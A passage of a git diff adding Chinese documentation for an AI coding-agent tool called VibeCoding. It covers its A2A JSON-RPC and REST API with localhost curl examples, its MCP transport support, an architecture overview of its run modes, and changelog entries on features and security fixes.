+    {
+      "id": "code-search",
+      "name": "Code Search",
+      "description": "Search codebases with ripgrep and fd"
+    }
+  ]
+}
+```
+
+## JSON-RPC 方法
+
+### `message/send`
+
+发送消息以创建或继续任务。
+
+**请求：**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "message/send",
+  "params": {
+    "task_id": "task_123",  // 可选，省略则创建新任务
+    "message": {
+      "role": "user",
+      "parts": [
+        {"type": "text", "text": "帮我重构 main.go"}
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+**响应（同步）：**
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "id": "task_123",
+    "state": "completed",
+    "artifacts": [
+      {
+        "name": "response",
+        "parts": [{"type": "text", "text": "我已经分析了 main.go..."}]
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+**SSE 流式（添加 `Accept: text/event-stream` 头）：**
+```
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":"让我"}]}}
+
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":"分析代码..."}]}}
+
+data: {"task_id":"task_123","state":"completed","artifact":{"name":"response","parts":[{"type":"text","text":"这是重构后的版本..."}]}}
+```
+
+### `task/get`
+
+获取任务当前状态。
+
+**请求：**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/get",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 2
+}
+```
+
+### `task/cancel`
+
+取消运行中的任务。
+
+**请求：**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/cancel",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 3
+}
+```
+
+## REST 端点
+
+为简化集成，也提供 REST 风格的端点：
+
+| 端点 | 方法 | 说明 |
+|------|------|------|
+| `/.well-known/agent.json` | GET | Agent Card |
+| `/a2a` | POST | JSON-RPC 2.0 端点 |
+| `/a2a/send` | POST | 提交任务（同步或 SSE） |
+| `/a2a/task?task_id=xxx` | GET | 获取任务状态 |
+| `/a2a/task/cancel` | POST | 取消任务 |
+| `/a2a/events?task_id=xxx` | GET | SSE 事件流 |
+
+## Task 状态
+
+```
+submitted ─► working ─► completed
+                    ─► failed
+                    ─► canceled
+```
+
+## 示例
+
+### 提交任务（curl）
+
+```bash
+# 同步响应
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "列出项目中的所有 Go 文件"}]
+      }
+    },
+    "id": 1
+  }'
+
+# SSE 流式
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -H "Accept: text/event-stream" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "解释项目结构"}]
+      }
+    },
+    "id": 1
+  }'
+```
+
+### REST API
+
+```bash
+# 提交任务
+curl -X POST http://localhost:8093/a2a/send \
+  -H "Content-Type: application/json" \
+  -d '{"message": {"role": "user", "parts": [{"type": "text", "text": "你好"}]}}'
+
+# 获取任务
+curl http://localhost:8093/a2a/task?task_id=task_123
+
+# 取消任务
+curl -X POST http://localhost:8093/a2a/task/cancel \
+  -H "Content-Type: application/json" \
+  -d '{"task_id": "task_123"}'
+```
+
+## 安全
+
+- **Auth Token**：Bearer token 认证（与 hermes 相同）
+- **Agent Card**：公开访问（无需认证）
+- **受保护端点**：配置 `auth_token` 后，`/a2a`、REST A2A 路由和 `/a2a/events` 都需要认证
+
+配置认证后，客户端需要发送：
+
+```bash
+Authorization: Bearer <auth_token>
+```
+
+## A2A Client
+
+向其他 A2A 服务器发送任务。
+
+```bash
+# 发送任务
+vibecoding a2a send "解释项目结构" --target http://remote:8093
+
+# 带认证发送
+vibecoding a2a send "运行测试" --target http://remote:8093 --auth-token xxx
+
+# 发现服务器能力
+vibecoding a2a discover http://remote:8093
+```
+
+## A2A 调度
+
+定时任务可以向 A2A 服务器发送任务，而不是运行本地 Agent。
+
+```bash
+# 调度每日任务到远程 A2A 服务器
+vibecoding hermes cron add "daily-review" "review recent changes" \
+  --schedule "@daily" \
+  --a2a-target http://review-agent:8093
+
+# 带认证的调度
+vibecoding hermes cron add "ci-check" "run CI tests" \
+  --schedule "@every 1h" \
+  --a2a-target http://ci-agent:8093 \
+  --a2a-token ${CI_TOKEN}
+```
+
+调度器会将 prompt 发送到 A2A 服务器，而不是启动本地 Agent。
+
+## A2A Master 模式
+
+A2A Master 模式让你可以在一个 VibeCoding 实例中管理多个远程 A2A Agent，通过 `a2a_dispatch` tool 向它们分发任务。
+
+### 快速开始
+
+```bash
+# 1. 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 2. 编辑 a2a-list.json，填入实际的远程 agent 信息
+#    位置：~/.vibecoding/a2a-list.json 或 .vibe/a2a-list.json
+
+# 3. 启用 master 模式
+vibecoding --enable-a2a-master
+```
+
+### 配置文件
+
+`a2a-list.json` 结构如下：
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://localhost:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://ci-server:8093",
+      "auth_token": "your-secret-token"
+    }
+  ]
+}
+```
+
+| 字段 | 类型 | 说明 |
+|------|------|------|
+| `name` | string | Agent 名称（唯一标识，用于 tool 调用） |
+| `url` | string | A2A 服务器地址 |
+| `auth_token` | string | Bearer Token（可选） |
+
+配置文件位置（优先级从低到高）：
+- `~/.vibecoding/a2a-list.json`（全局）
+- `.vibe/a2a-list.json`（项目级，覆盖全局）
+
+### a2a_dispatch Tool
+
+启用后，LLM 会多出一个 `a2a_dispatch` tool，可以向注册的远程 agent 发送任务：
+
+**参数：**
+| 参数 | 类型 | 说明 |
+|------|------|------|
+| `agent_name` | string | 目标 agent 名称（从配置中自动枚举） |
+| `message` | string | 任务消息 |
+
+**示例：**
+```
+a2a_dispatch(agent_name="code-reviewer", message="review main.go for bugs")
+a2a_dispatch(agent_name="ci-agent", message="run all unit tests")
+```
+
+### CLI 参数
+
+| 参数 | 说明 |
+|------|------|
+| `--enable-a2a-master` | 启用 A2A Master 模式（默认关闭） |
+| `--init-a2a-master-config` | 生成示例 `a2a-list.json` |
+| `--force` | 覆盖已存在的配置文件 |
diff --git a/docs/zh/acp.md b/docs/zh/acp.md
index 6cc5a1e..977e30d 100644
--- a/docs/zh/acp.md
+++ b/docs/zh/acp.md
@@ -56,6 +56,9 @@ vibecoding acp --sandbox
 
 # 指定模式
 vibecoding acp --mode agent
+
+# 启用多 Agent 工具
+vibecoding acp --multi-agent
 ```
 
 ### ACP 命令行参数
@@ -69,6 +72,7 @@ vibecoding acp --mode agent
 | `--sandbox` | - | false | 启用沙箱 |
 | `--verbose` | - | false | 详细输出 |
 | `--debug` | - | false | 调试日志 |
+| `--multi-agent` | - | false | 启用子 Agent 工具和多 Agent 工作流 |
 
 ## 协议细节
 
@@ -90,9 +94,10 @@ ACP 使用 JSON-RPC 2.0 通过 stdio 进行通信。协议支持以下方法：
 VibeCoding 在初始化时声明以下 ACP 能力：
 
 - **加载会话**: 加载和继续之前的会话
-- **提示能力**: 文本提示（图像/音频即将支持）
+- **提示能力**: 文本提示；ACP prompt 不声明图像/音频输入能力
 - **会话能力**: 取消活动中的提示
-- **MCP 能力**: 支持 stdio 传输
+- **MCP 能力**: 支持 stdio / http / sse 传输
+- **多 Agent 工作流**: 使用 `--multi-agent` 启动 ACP 服务器后可用
 
 ### 通知
 
@@ -110,6 +115,8 @@ VibeCoding 在初始化时声明以下 ACP 能力：
 
 VibeCoding 支持在 ACP 会话期间连接 **MCP (Model Context Protocol)** 服务器。这让代理能够访问外部工具和数据源。
 
+ACP 会话与普通 CLI/TUI 会话复用同一套 MCP 连接和工具注册运行时。区别是 ACP 客户端在创建/加载会话时传入 `mcpServers`，普通 CLI/TUI 会话则在进程启动时加载 `mcp.json`。
+
 ### 配置 MCP 服务器
 
 MCP 服务器由 IDE 客户端配置，并在创建或加载会话时传递给 VibeCoding。配置格式：
@@ -119,11 +126,26 @@ MCP 服务器由 IDE 客户端配置，并在创建或加载会话时传递给 V
   "mcpServers": [
     {
       "name": "my-database",
+      "type": "stdio",
       "command": "/absolute/path/to/mcp-server",
       "args": ["--port", "8080"],
       "env": [
         {"name": "DB_URL", "value": "postgres://localhost/mydb"}
       ]
+    },
+    {
+      "name": "remote-tools",
+      "type": "http",
+      "url": "https://mcp.example.com",
+      "headers": [
+        {"name": "Authorization", "value": "Bearer ${TOKEN}"}
+      ]
+    },
+    {
+      "name": "legacy-sse",
+      "type": "sse",
+      "url": "https://legacy.example.com/sse",
+      "messageUrl": "https://legacy.example.com/messages"
     }
   ]
 }
@@ -133,9 +155,27 @@ MCP 服务器由 IDE 客户端配置，并在创建或加载会话时传递给 V
 
 当 MCP 服务器连接后，VibeCoding 自动发现并注册服务器暴露的所有工具。工具按照 `mcp_<server_name>_<tool_name>` 的命名约定注册，代理可以像使用内置工具一样使用它们。
 
+注册发生在 agent 冻结当前会话的 system prompt 和工具定义之前。因此 MCP 服务器变更后，需要用更新后的 `mcpServers` payload 创建或加载新的 ACP 会话。
+
+除 `tools/*` 外，VibeCoding 现在还会发现：
+
+- `resources/*`：注册为 MCP 资源读取工具
+- `prompts/*`：注册为 MCP Prompt 渲染工具
+
 ### MCP 传输支持
 
-目前只支持 MCP 服务器的 `stdio` 传输。服务器命令必须是绝对路径。
+支持的传输类型：
+
+- `stdio`：要求 `command` 为绝对路径
+- `http`：通过 `url` 连接 streamable HTTP 端点
+- `sse`：通过 `url` 连接 legacy SSE 流，并通过 `messageUrl` 发送请求
+
+补充说明：
+
+- 同一会话内 MCP 服务器 `name` 必须唯一
+- `http` / `sse` 传输可通过 `headers` 传鉴权头
+- `sampling/createMessage` 已桥接到当前 ACP provider/model，并返回 assistant 文本内容
+- MCP progress/logging/cancel 通知会以结构化 ACP `tool_call_update` 事件透出
 
 ## 权限系统
 
@@ -215,4 +255,4 @@ npm install -g vibecoding-installer
 
 ### 步骤 3：开始使用
 
-使用 JetBrains IDE 中的 ACP 工具窗口与 VibeCoding 交互。
\ No newline at end of file
+使用 JetBrains IDE 中的 ACP 工具窗口与 VibeCoding 交互。
diff --git a/docs/zh/architecture.md b/docs/zh/architecture.md
index da204f4..75ff464 100644
--- a/docs/zh/architecture.md
+++ b/docs/zh/architecture.md
@@ -4,20 +4,43 @@
 
 ```
 vibecoding/
+├── agent/                       # 公共 Agent/Provider 接口与 Builder
 ├── cmd/vibecoding/              # CLI 入口点
 │   └── main.go                  # 主程序
 ├── internal/
+│   ├── a2a/                     # A2A 协议服务器与 Master 模式
+│   │   ├── config.go            # A2A 配置与初始化
+│   │   ├── handler.go           # JSON-RPC 2.0 handler + SSE
+│   │   ├── client.go            # A2A 客户端
+│   │   ├── server.go            # HTTP 服务器
+│   │   ├── executor.go          # Task → Agent loop 执行器
+│   │   ├── agent_card.go        # Agent Card 生成
+│   │   ├── task.go              # Task 生命周期管理
+│   │   └── master.go            # A2A Master 模式（远程 agent 调度）
+│   ├── acp/                     # ACP / MCP 集成
 │   ├── agent/                   # 核心 Agent 循环
 │   │   ├── agent.go             # Agent 主逻辑
+│   │   ├── factory.go           # AgentFactory，统一每个 Agent 的创建
+│   │   ├── manager.go           # AgentManager 生命周期管理
+│   │   ├── router.go            # EventRouter
+│   │   ├── subagent.go          # subagent_* 工具
 │   │   ├── events.go            # 事件类型定义
 │   │   ├── provider.go          # Provider 接口适配
 │   │   └── system_prompt.go     # 系统提示词生成
 │   ├── config/                  # 配置管理
 │   ├── context/                 # 上下文管理和 token 估算
 │   ├── contextfiles/            # 上下文文件加载
+│   ├── cron/                    # 定时任务存储和调度器
+│   ├── gateway/                 # OpenAI 兼容 HTTP 网关
+│   ├── hermes/                  # 消息平台网关 (微信/飞书/WebSocket)
+│   ├── mcp/                     # MCP 服务器集成
+│   ├── memory/                  # 持久化记忆 (memory.md)
+│   ├── messaging/               # 消息平台抽象
 │   ├── platform/                # 跨平台兼容工具
 │   ├── provider/                # LLM Provider 抽象
 │   │   ├── anthropic/           # Anthropic Messages API
+│   │   ├── factory/             # 共享 provider/model 创建逻辑
+│   │   ├── vendor*.go           # 厂商适配注册和默认值
 │   │   └── openai/              # OpenAI Chat Completions API
 │   ├── sandbox/                 # 沙箱抽象 (bwrap, none)
 │   ├── session/                 # 会话管理 (JSONL)
@@ -29,17 +52,47 @@ vibecoding/
 │   │   ├── edit.go              # 文件编辑
 │   │   ├── grep.go              # 内容搜索
 │   │   ├── find.go              # 文件查找
-│   │   └── ls.go                # 目录列表
+│   │   ├── ls.go                # 目录列表
+│   │   ├── plan.go              # 任务规划
+│   │   ├── skill_ref.go         # 技能引用加载
+│   │   └── a2a_dispatch.go      # A2A 远程 agent 调度
 │   ├── tui/                     # 终端 UI (BubbleTea)
-│   └── ua/                      # User-Agent 字符串生成
-└── pkg/sdk/                     # 公共 SDK (未来)
+│   ├── ua/                      # User-Agent 字符串生成
+│   └── vendored/                # 内嵌二进制 (rg, fd)
+└── pkg/sdk/                     # 公共 SDK 接口
+```
+
+## 运行模式
+
+VibeCoding 支持 7 种运行模式，共享同一套 Agent、Provider、Tools、Session 基础设施：
+
+```
+┌─────────────────────────────────────────────────────────────────────────┐
+│                        VibeCoding 运行模式                               │
+├─────────────────────────────────────────────────────────────────────────┤
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐                  │
+│  │  TUI (默认)   │  │  Print 模式   │  │  ACP stdio   │                  │
+│  │  vibecoding   │  │  vibecoding   │  │  vibecoding   │                  │
+│  │              │  │  -p "..."     │  │  acp          │                  │
+│  └──────────────┘  └──────────────┘  └──────────────┘                  │
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐  ┌────────────┐ │
+│  │ Gateway 模式  │  │  Hermes 模式  │  │  A2A 独立模式 │  │ A2A Master │ │
+│  │  vibecoding   │  │  vibecoding   │  │ vibecoding    │  │ --enable-  │ │
+│  │  gateway      │  │  hermes       │  │ a2a start     │  │ a2a-master │ │
+│  └──────────────┘  └──────────────┘  └──────────────┘  └────────────┘ │
+│                                                                         │
+└─────────────────────────────────────────────────────────────────────────┘
 ```
 
 ## 核心组件
 
 ### 1. Provider 系统
 
-Provider 是与 LLM API 交互的抽象层。
+Provider 是与 LLM API 交互的抽象层。所有运行模式的 provider 创建都经过
+`internal/provider/factory`，先应用厂商适配默认值，再构造通用 OpenAI
+兼容或 Anthropic 兼容协议 provider。
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -51,15 +104,21 @@ Provider 是与 LLM API 交互的抽象层。
 │  Name() string                                              │
 └─────────────────────────────────────────────────────────────┘
                               │
-            ┌─────────────────┼─────────────────┐
-            │                 │                 │
-            ▼                 ▼                 ▼
-    ┌───────────────┐ ┌───────────────┐ ┌───────────────┐
-    │  OpenAI       │ │  Anthropic    │ │  Custom       │
-    │  Provider     │ │  Provider     │ │  Provider     │
-    └───────────────┘ └───────────────┘ └───────────────┘
+                              │
+            ┌─────────────────┴─────────────────┐
+            ▼                                   ▼
+    ┌───────────────────┐             ┌───────────────────┐
+    │ 厂商适配器         │             │ 通用 fallback      │
+    │ vendor_*.go       │             │ openai/anthropic  │
+    └───────────────────┘             └───────────────────┘
 ```
 
+厂商选择顺序：
+
+1. provider 配置中的显式 `vendor`
+2. 根据 Base URL 自动识别
+3. 根据 `api` 回退到通用协议 provider
+
 #### StreamEvent 类型
 
 ```go
@@ -75,7 +134,8 @@ type StreamEvent struct {
 
 ### 2. Agent 循环
 
-Agent 是核心逻辑，协调 Provider、Tools 和 Session。
+Agent 是核心逻辑，协调 Provider、Tools 和 Session。所有运行模式复用同一个
+Agent 循环，区别在于输入来源（终端、HTTP、消息平台、stdio）和输出目标。
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -93,7 +153,7 @@ Agent 是核心逻辑，协调 Provider、Tools 和 Session。
 #### 执行流程
 
 ```
-User Input
+User Input (TUI / HTTP / Messaging / A2A / ACP stdio)
     │
     ▼
 ┌───────────────┐
@@ -122,9 +182,186 @@ User Input
                        └───────────────┘
 ```
 
-### 3. 工具系统
+### 3. 多 Agent 运行时
+
+多 Agent 模式通过 `--multi-agent` 显式启用。启用后，主 Agent 会获得
+`subagent_spawn`、`subagent_status`、`subagent_send`、`subagent_destroy`
+工具。子 Agent 拥有独立的 messages、context、session、registry 和 job
+manager 状态。
+
+```
+Main Agent
+    │
+    ├── AgentManager 创建子 Agent
+    ├── EventRouter 按 AgentID 路由事件
+    └── subagent_* 工具管理异步子任务
+```
+
+子 Agent 的 registry 会过滤 `subagent_*` 工具，因此不能继续创建嵌套子 Agent。
+
+### 4. A2A 协议
+
+A2A（Agent-to-Agent）协议使不同的 AI Agent 能够互相发现、通信和协作。
+
+```
+┌───────────────────────────────────────────────────────────────────┐
+│                     A2A 协议架构                                    │
+├───────────────────────────────────────────────────────────────────┤
+│                                                                   │
+│  ┌──────────────────┐          ┌──────────────────┐              │
+│  │   A2A Server     │          │   A2A Client     │              │
+│  │  (vibecoding)    │ ◄──────► │  (任意 Agent)     │              │
+│  │                  │  JSON-RPC │                  │              │
+│  │  /a2a            │  2.0     │  SendMessage()   │              │
+│  │  /a2a/send       │  + SSE   │  GetTask()       │              │
+│  │  /a2a/task       │          │  CancelTask()    │              │
+│  │  /a2a/events     │          │  GetAgentCard()  │              │
+│  └──────────────────┘          └──────────────────┘              │
+│                                                                   │
+│  Task 生命周期: submitted → working → completed/failed/canceled    │
+│                                                                   │
+│  两种运行方式:                                                     │
+│  • 独立模式: vibecoding a2a start (端口 8093)                      │
+│  • 集成模式: hermes.json a2a.enabled: true (共享端口 8090)         │
+│                                                                   │
+└───────────────────────────────────────────────────────────────────┘
+```
+
+#### A2A Master 模式
+
+A2A Master 模式通过 `--enable-a2a-master` 启用，加载 `a2a-list.json`
+配置的远程 agent 列表，注册 `a2a_dispatch` tool 让 LLM 自动分发任务。
+
+```
+┌───────────────────────────────────────────────────────────────┐
+│                   A2A Master 模式                               │
+├───────────────────────────────────────────────────────────────┤
+│                                                               │
+│  a2a-list.json                                                │
+│  ┌─────────────────────────────────────────┐                  │
+│  │ agents:                                 │                  │
+│  │   - name: code-reviewer                 │                  │
+│  │     url: http://review:8093             │                  │
+│  │   - name: ci-agent                      │                  │
+│  │     url: http://ci:8093                 │                  │
+│  └─────────────────────────────────────────┘                  │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │   A2AManager     │ ← 加载 agent 列表                        │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │  a2a_dispatch    │ ← 注册为 LLM tool                       │
+│  │  (agent_name,    │                                         │
+│  │   message)       │                                         │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐  ┌──────────────────┐                  │
+│  │  code-reviewer   │  │  ci-agent        │                  │
+│  │  http://review   │  │  http://ci       │                  │
+│  │  :8093           │  │  :8093           │                  │
+│  └──────────────────┘  └──────────────────┘                  │
+│                                                               │
+└───────────────────────────────────────────────────────────────┘
+```
+
+### 5. Gateway 模式
+
+`internal/gateway/` 实现 OpenAI 兼容的 HTTP 网关，暴露标准 Chat Completions API。
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Gateway 架构                               │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  OpenAI 兼容客户端 (curl, SDK, 任意工具)                      │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  HTTP Gateway (net/http)                 │               │
+│  │  POST /v1/chat/completions               │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (复用同一套)                   │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  配置: gateway.json (全局 ~/.vibecoding/ 或项目 .vibe/)       │
+│  安全: Bearer token + allowedWorkDirs + sandbox              │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 6. Hermes 消息平台网关
+
+`internal/hermes/` 实现消息平台网关，支持微信、飞书和 WebSocket。
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Hermes 架构                                │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────┐  ┌──────────┐  ┌──────────┐                  │
+│  │  微信     │  │  飞书     │  │ WebSocket │                  │
+│  └─────┬────┘  └─────┬────┘  └─────┬────┘                  │
+│        │             │             │                         │
+│        └─────────────┼─────────────┘                         │
+│                      ▼                                       │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Hermes Dispatcher                       │               │
+│  │  (per-user session, yolo mode default)   │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (复用同一套)                   │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  配置: hermes.json                                           │
+│  Session: <sessionDir>/hermes/<platform>/<user_id>/          │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 7. Cron 调度器
+
+`internal/cron` 包提供文件持久化的 cron store 和 scheduler，可通过子 Agent
+或远程 A2A Server 执行任务。TUI 在多 Agent 模式下暴露 `/cron` 命令入口。
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Cron 调度器                                │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────────────┐                                       │
+│  │  CronStore       │ ← cron.json 持久化                     │
+│  │  (FileCronStore) │                                       │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│           ▼                                                 │
+│  ┌──────────────────┐                                       │
+│  │  Scheduler       │ ← 定时轮询 (默认 30s)                  │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│     ┌─────┴─────┐                                           │
+│     ▼           ▼                                           │
+│  ┌───────┐  ┌───────────┐                                   │
+│  │ 子Agent│  │ A2A Server│                                   │
+│  │ (本地) │  │ (远程)    │  ← --a2a-target 参数               │
+│  └───────┘  └───────────┘                                   │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 8. 工具系统
 
-工具是 Agent 与外部世界交互的方式。
+工具是 Agent 与外部世界交互的方式。所有运行模式共享同一套工具注册表。
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -143,11 +380,17 @@ User Input
 │  File Tools   │   │  Search Tools │   │  System Tools │
 │  - read       │   │  - grep       │   │  - bash       │
 │  - write      │   │  - find       │   │  - ls         │
-│  - edit       │   │               │   │               │
+│  - edit       │   │               │   │  - jobs       │
+└───────────────┘   └───────────────┘   │  - kill       │
+                                        └───────────────┘
+┌───────────────┐   ┌───────────────┐   ┌───────────────┐
+│  Planning     │   │  Skills       │   │  A2A Master   │
+│  - plan       │   │  - skill_ref  │   │  - a2a_       │
+│               │   │               │   │    dispatch   │
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 4. 会话管理
+### 9. 会话管理
 
 会话使用 JSONL 格式存储，支持树状结构和分支。
 
@@ -190,7 +433,7 @@ User Input
 | `compaction` | 上下文压缩记录 |
 | `label` | 会话标签 |
 
-### 5. 沙箱系统
+### 10. 沙箱系统
 
 沙箱通过 bubblewrap (bwrap) 实现进程隔离。
 
@@ -212,7 +455,7 @@ User Input
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 6. TUI 系统
+### 11. TUI 系统
 
 基于 BubbleTea 的终端用户界面。
 
@@ -241,15 +484,28 @@ User Input
 └─────────────────────────────────────────────────────────────┘
 ```
 
+## 配置文件总览
+
+| 文件 | 位置 | 用途 |
+|------|------|------|
+| `settings.json` | `~/.vibecoding/` 或 `.vibe/` | 核心设置（provider、model、mode 等） |
+| `gateway.json` | `~/.vibecoding/` 或 `.vibe/` | HTTP 网关配置 |
+| `hermes.json` | `~/.vibecoding/` 或 `.vibe/` | 消息平台网关配置 |
+| `a2a.json` | `~/.vibecoding/` 或 `.vibe/` | A2A 服务器配置 |
+| `a2a-list.json` | `~/.vibecoding/` 或 `.vibe/` | A2A Master 远程 agent 列表 |
+| `mcp.json` | `~/.vibecoding/` 或 `.vibe/` | MCP 服务器配置 |
+| `memory.md` | 项目根目录或 `~/.vibecoding/` | 持久化记忆 |
+| `cron.json` | `~/.vibecoding/` | 定时任务持久化 |
+
 ## 数据流
 
 ### 完整请求流程
 
 ```
-1. 用户输入
+1. 用户输入 (来自 TUI / HTTP / Messaging / A2A / ACP stdio)
    │
    ▼
-2. TUI 捕获输入
+2. 输入层捕获
    │
    ▼
 3. Agent.Run(ctx, input)
@@ -273,7 +529,7 @@ User Input
 7. SSE 流式响应
    ├── TextDelta → 显示文本
    ├── ThinkingDelta → 显示思考
-   └── ToolCall → 执行工具
+   └── ToolCall → 执行工具 (含 a2a_dispatch)
    │
    ▼
 8. 工具执行 (通过 Sandbox)
@@ -309,3 +565,14 @@ User Input
 ### 5. 沙箱隔离
 
 通过 bubblewrap 实现进程级隔离，保护系统安全。
+
+### 6. 公共 SDK 包
+
+`agent/` 包暴露公共 Go 类型（`Agent`、`Provider`、`Builder`），外部应用可以
+在不依赖 internal 包的情况下嵌入 Agent。
+详见 [SDK 集成指南](sdk.md)。
+
+### 7. 复用 Agent 循环
+
+所有运行模式（TUI、Gateway、Hermes、A2A、ACP）复用同一个 Agent 循环，
+区别仅在于输入来源和输出目标。这保证了行为一致性，避免了逻辑分叉。
diff --git a/docs/zh/changelog.md b/docs/zh/changelog.md
index 4040265..e233728 100644
--- a/docs/zh/changelog.md
+++ b/docs/zh/changelog.md
@@ -1,5 +1,759 @@
 # 更新日志
 
+
+## v0.1.32
+
+### ✨ 新功能
+
+- **工具系统完整性**
+  - 补充所有已注册工具的完整文档：`jobs`、`kill`、`question`、`memory`、`cron` 及 MCP 动态工具
+  - `jobs` 工具：列出并查看通过 `bash async=true` 启动的后台任务，支持清理已完成任务
+  - `kill` 工具：通过 Job ID 终止正在运行的后台任务
+  - `question` 工具：Plan 模式下 AI 可向用户提出多选问题以澄清需求
+  - `memory` 工具（Hermes）：通过 `memory.md` 实现跨会话持久记忆，支持 read/add/update/delete 操作
+  - `cron` 工具（Hermes/多 Agent）：通过子 Agent 执行定时后台任务，支持 `@daily`、`@weekly`、`@every N` 调度及单次执行
+  - MCP 动态工具：来自 MCP 服务器的 tools/resources/prompts 在会话中自动发现和注册
+
+- **Plan 模式提问工具**
+  - 新增 `question` 工具，仅在 TUI + plan 模式下注册
+  - AI 可向用户提出多选问题，用户选择预设选项或输入自定义答案
+  - 用于在制定方案前澄清需求，形成更优质的计划
+  - 通过 `QuestionHandler` 可选接口暴露（类型断言），不污染公共 `Agent` 接口
+
+### 🐛 Bug 修复
+
+- **Bash 工具输出安全**
+  - 同步 bash 模式新增 1GB 输出限制，使用 `limitedBuffer` 防止无界 `bytes.Buffer` 导致 OOM
+
+- **Hermes `/compact` 命令**
+  - 实现 Hermes 消息模式下的 `/compact` 斜杠命令（之前是 TODO 桩）
+  - 在 session 上设置 `ForceCompact` 标志，下次 agent 运行时消费以触发上下文压缩
+
+- **Session 持久性**
+  - `writeEntry` 写入后调用 `f.Sync()`，保证崩溃或断电后数据不丢失
+  - 损坏的 session 行现在记录为 warning 并跳过，不再阻止 session 加载
+
+- **Hermes 审批竞态修复**
+  - `ResolveApproval` 使用 `select` 发送，避免超时与审批竞态时写入已消费的 channel
+
+- **子代理 Panic 日志**
+  - `sendParentEvent` 在 recover 前记录 panic 值，便于诊断关闭 channel 的竞态
+
+- **原子文件写入清理**
+  - `writeFileAtomic` 移除 `defer os.Remove(tmpPath)`，改为各错误路径显式清理，避免成功后尝试删除已重命名的文件
+
+- **Agent 循环检测可配置化**
+  - `MaxConsecutiveNoText`（卡住检测阈值）可通过 `AgentLoopConfig` 配置（默认 95）
+  - 修复错误消息中错误地将前后警告计数器相加的问题
+
+- **Job Manager 自动清理**
+  - `AddJob` 时自动 GC 30 分钟前完成的 job（每 5 分钟检查一次）
+
+- **Cron 调度器错误日志**
+  - `checkAndRun` 现在记录 store 错误，不再静默吞掉
+
+- **TUI Bash 输出显示**
+  - 压缩 bash 工具输出摘要，去除空行，避免 TUI 折叠视图中占用过高垂直空间
+
+- **内嵌搜索工具**
+  - 当当前架构没有内嵌 `rg` / `fd` 时，退回使用系统 `grep` / `find`
+
+### 📦 分发
+
+- 新增 Linux LoongArch64 (`loong64`) 构建与打包目标，包括 tarball、Debian 和 npm 包元数据
+
+### ✅ 测试
+
+- 新增 `limitedBuffer` 截断、`JobManager` GC、`writeFileAtomic` 清理、`sendParentEvent` panic 恢复、`MaxConsecutiveNoText` 可配置性、session fsync 持久性、损坏行容忍、`QuestionTool` 元数据/模式过滤/执行/错误处理的单元测试
+
+
+## v0.1.31
+
+### 🐛 Bug 修复
+
+- **终端输入**
+  - 输入框支持 Home/End 光标移动
+  - 修复在权限审批提示中按 Esc 取消后，第一次回车提交的输入被吞掉的问题
+  - 输入框支持 Up/Down 历史记录导航，并可反复上下选择历史输入
+
+- **A2A 安全与可靠性**
+  - A2A 默认监听地址从 `0.0.0.0` 改为 `127.0.0.1`
+  - 为 `/a2a`、REST A2A 路由和 SSE 事件添加 Bearer token 认证，同时保持 Agent Card 公开
+  - 将基于时间戳的 A2A task ID 替换为抗碰撞的随机 ID
+  - A2A task store 读写改为使用 task 快照，避免外部意外修改共享状态
+
+- **路径与 Session 安全**
